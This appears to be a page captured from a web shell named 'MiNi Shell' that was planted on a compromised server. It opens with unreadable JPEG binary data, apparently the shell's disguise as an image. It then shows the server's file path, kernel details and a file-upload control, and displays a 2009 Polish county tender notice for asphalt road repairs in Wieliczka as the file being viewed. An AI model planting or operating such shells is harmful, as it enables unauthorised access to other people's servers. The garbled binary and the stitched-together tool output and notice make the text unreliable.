JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090114/4346-N-2009.html

<p class="kh_header"><b>Wieliczka: Remont cząstkowy nawierzchni asfaltowych na drogach powiatowych Powiatu Wielickiego w 2009 r.
Część I: Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Wieliczka, Biskupice, Niepołomice.
Część II: Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Gdów, Kłaj</b><br>
<b>Numer ogłoszenia: 4346 - 2009; data zamieszczenia: 14.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Wieliczce , ul. Sienkiewicza 13A, 32-020 Wieliczka, woj. małopolskie, tel. 012 2882874, faks 012 2500378.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa sam. ter. Powiatu Wielickiego - Zarząd Dróg Powiatowych w Wieliczce.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cząstkowy nawierzchni asfaltowych na drogach powiatowych Powiatu Wielickiego w 2009 r.
Część I: Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Wieliczka, Biskupice, Niepołomice.
Część II: Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Gdów, Kłaj.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont cząstkowy nawierzchni asfaltowych na drogach powiatowych Powiatu Wielickiego w 2009 r.
Zakres obejmuje następujące części:
Część I: Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Wieliczka, Biskupice, Niepołomice.
1)remont cząstkowy nawierzchni asfaltowych - asfaltem lanym wraz z obcięciem mechanicznym krawędzi, głębokość ubytków 4 cm, na powierzchni 800 m2,
2)remont cząstkowy nawierzchni asfaltowych - emulsją modyfikowaną i grysami przy użyciu remontera, głębokość ubytków 4 cm, na powierzchni 3 500 m2.
Część II: Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Gdów, Kłaj.
1) remont cząstkowy nawierzchni asfaltowych - emulsją modyfikowaną i grysami przy użyciu remontera, głębokość ubytków 4 cm, na powierzchni 4 000 m2.
Szczegółowy zakres i sposób wykonania robót ujęty został w:
- Formularzu cenowym - zał. C do SIWZ,
-Specyfikacji Technicznej Wykonania i Odbioru Robót - zał. D do SIWZ.
Miejsce realizacji zamówienia to drogi powiatowe na terenie Powiatu Wielickiego. 
Kolejność remontowanych dróg będzie wskazywana każdorazowo przez Zamawiającego za pośrednictwem inspektora nadzorującego prawidłowe wykonanie zamówienia.
Wymagany jest jeden remonter dla każdej części zamówienia. 
Na Wykonawcy spoczywa obowiązek, aby zapoznał się z miejscem realizacji przedmiotu zamówienia, a także zdobył na własną odpowiedzialność i ryzyko wszelkie informacje, które mogą być potrzebne do przygotowania oferty.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca wnosi wadium:
1) dla części I zamówienia w wysokości 4 000,00 zł. (słownie: cztery tysiące złotych 00/100) 
2) dla części II zamówienia w wysokości 3 000,00 zł. (słownie: trzy tysiące złotych 00/100) 
- najpóźniej do dnia 04.02.2009 r. do godz. 09:00.
Wadium może być wnoszone w:
a)pieniądzu, 
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zmianami).
Wykonawca sam wybiera sobie formę wadium.
W przypadku wyboru pieniężnej formy, wadium należy wpłacić przelewem na konto Zarządu Dróg Powiatowych  Nr 98-86190006-0010-0200-7168-0002
Wadium wniesione w pieniądzu na konto ZDP musi wpłynąć na rachunek Zamawiającego najpóźniej do dnia 04.02.2009 r.  do godz. 09:00. 
W przypadku wnoszenia wadium w formie niepieniężnej należy je umieścić 
w oryginale, w kopercie wraz z ofertą (ale nie łączyć trwale z pozostałymi dokumentami), a kserokopię poświadczoną za zgodność z oryginałem przez osobę(-y) uprawnioną (-e) dołączyć do oferty. Wymagana ważność tej formy wadium - 30 dni od terminu składania ofert.
Zamawiający niezwłocznie zwróci wadium z chwilą :
a.upływu terminu związania ofertą,
b.zawarcia umowy i wniesienia zabezpieczenia należytego wykonania umowy,
c.unieważnienia postępowania, jeżeli protesty zostały rozstrzygnięte lub upłynął termin do ich wnoszenia.
Zamawiający, z zastrzeżeniem ppkt. 11.11 SIWZ, zwróci wadium niezwłocznie na wniosek Wykonawcy,:
a.który wycofał ofertę przed upływem terminu składania ofert,
b.który został wykluczony z postępowania,
c.którego, oferta została odrzucona, 
Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie Art. 46 ust. 2 pkt 2 i 3 uPzp, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami, wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
a.wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 uPzp, lub pełnomocnictw nie złożył ich w określonym terminie, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,  
b.wykonawca odmówi podpisania umowy na warunkach określonych w ofercie,
c.wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia,
d.zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
2)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
-wymagane jest wykonanie w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlanych odpowiadających swoim rodzajem       i wartością robotom budowlanym stanowiącym przedmiot zamówienia (wymagane jest min. jedno zadanie obejmujące wykonanie min. 4 000 m2 remontu cząstkowego nawierzchni asfaltowych), z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów (referencji protokołów odbioru itp.) potwierdzających, że roboty te zostały wykonane należycie - dokumenty te dodatkowo muszą zawierać ilość metrów kwadratowych wykonanych remontów. 
-wymagana jest osoba koordynująca - pełniąca funkcję kierownika lub majstra,
-wymagany jest remonter dla każdej części zamówienia.
3)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez wykonawcę, podmioty występujące wspólnie) dokumentów na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty i oświadczenia, jakie należy załączyć do oferty to:
1)Wypełniony Formularz ofertowy z wykorzystaniem wzoru wg Załącznika A,
2)Oświadczenie, że Wykonawca nie podlega wykluczeniu, z postępowania na podstawie art. 24 ust.1 i 2  i spełnia wymogi art. 22 ust. 1, ustawy Prawo Zamówień Publicznych, z wykorzystaniem wzoru Zał. 1 do SIWZ - będzie stanowić Załącznik 1 do oferty,
3)Kosztorys ofertowy dla każdej z części zamówienia oddzielny, opracowany metodą kalkulacji uproszczonej, na podstawie załączonego formularza cenowego, stanowiącego załącznik C do SIWZ - będzie stanowić Załącznik 2 do oferty,
4)Dowód wniesienia wadium - będzie stanowić Załącznik 3 do oferty,
5)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert - będzie stanowić Załącznik 4 do oferty,
6)W celu potwierdzenia spełniania warunków określonych w pkt. 8.1.2. należy załączyć:
a)wykaz wykonanych w ciągu ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, robót budowlanych odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia (wymagane jest min. jedno zadanie obejmujące wykonanie min. 4 000 m2 remontu cząstkowego nawierzchni asfaltowych), z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów (referencji protokołów odbioru itp.) potwierdzających, że roboty te zostały wykonane należycie - dokumenty te dodatkowo muszą zawierać ilość metrów kwadratowych wykonanych remontów, z wykorzystaniem wzoru Zał.  5 do SIWZ - będzie stanowić Załącznik 5 do oferty,
b)Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności  (wymagana jest osoba koordynująca, pełniąca funkcję kierownika lub majstra) i wykaz części zamówienia powierzonych podwykonawcom. 
Wykaz przygotować z wykorzystaniem wzoru Zał. 6 do SIWZ - będzie stanowić Załącznik 6 do oferty,
c)Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie pkt. 6b wykonawca wskazał osoby, którymi będzie dysponował  - będzie stanowić Załącznik 6a do oferty,   
d)Wykaz posiadanego sprzętu niezbędnego do wykonania zamówienia, którym dysponuje, lub będzie dysponował wykonawca (wymagany jest remonter na każdą część zamówienia) - będzie stanowić Załącznik 7 do oferty,
e)Pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnego do wykonania sprzętu, jeżeli w wykazie o którym mowa w pkt 6d, wykonawca wskazał sprzęt, którym będzie dysponował - będzie stanowić Załącznik 7a do oferty,    
7)Pełnomocnictwo, o którym mowa pkt. 8.4.3  SIWZ.- będzie stanowić Załącznik 8  do oferty, (załączyć jeśli dotyczy)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zdp.wieliczka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Wieliczce, ul. Sienkiewicza 13A, 32-020 Wieliczka, parter, pokój 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 09:00, miejsce: Zarząd Dróg Powiatowych w Wieliczce, ul. Sienkiewicza 13A, 32-020 Wieliczka, parter, pokój 1.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Wieliczka, Biskupice, Niepołomice.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obejmuje:
Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Wieliczka, Biskupice, Niepołomice.
1)remont cząstkowy nawierzchni asfaltowych - asfaltem lanym wraz z obcięciem mechanicznym krawędzi, głębokość ubytków 4 cm, na powierzchni 800 m2,
2)remont cząstkowy nawierzchni asfaltowych - emulsją modyfikowaną i grysami przy użyciu remontera, głębokość ubytków 4 cm, na powierzchni 3 500 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Gdów, Kłaj.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres obejmuje remont cząstkowy nawierzchni asfaltowych dróg powiatowych na terenie gmin: Gdów, Kłaj - emulsją modyfikowaną i grysami przy użyciu remontera, głębokość ubytków 4 cm, na powierzchni 4 000 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com